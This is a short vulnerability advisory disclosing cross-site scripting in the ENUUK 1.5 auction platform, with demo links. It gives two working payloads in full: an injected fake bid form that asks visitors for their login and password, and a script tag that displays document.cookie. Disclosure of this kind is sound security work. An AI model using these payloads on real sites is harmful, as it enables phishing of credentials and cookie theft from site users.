Roboteto Security Advisor's
=====================
XSS Attacks on ENUUK V 1.5
Input Validation Error on ENUUK, Cross Site Scripting on any auction.
Please see the demo on Sunday 22 de November
http://www.phpauction.net/enuuk-auction-platform/offer/details/8 (alternate form validator)
http://www.phpauction.net/enuuk-auction-platform/offer/details/7 (document.cookie)
http://www.phpauction.net/enuuk-auction-platform/ (alerts on nickname)
You can introduce any HTML tag on textareas (before disabling Javascript option on navigator).
You can put a form like this:
A hack to this website and all websites with ENUUK (without quotes):
<div>A hack to this website and all websites with ENUUK:
<div width=800 height=400 style=background-color:#faa>
<h3>To bid please, fill this form (please, be sure that is your password)</h3><br>
<form name=form method=get class=header-login action=http://www.phpauction.net/enuuk-auction-platform/offer/edit/8>
User: <input name=login type=text><br><br>
Password <input name=passwd type=password><br><br>
<a class=button href=javascript:void() onclick=document.form.submit();>Bid this! <img src=themes/default/img/buttonArrow.gif></a><br><br>
</form>
</div>
You can introduce on any input form a <script> tag, that allows you to javascript injection:
Introduce your name: roboteto<script>alert(document.cookie);</script>
Author:
These vulnerabilities have been found and released without any damages for ENUUK or its customers by
Roboteto.
You can find me at roboteto[AT|NOSPAM]hotmail[DOT|NOTSPAM]es for securing your sites.
Sincerely,
Roboteto.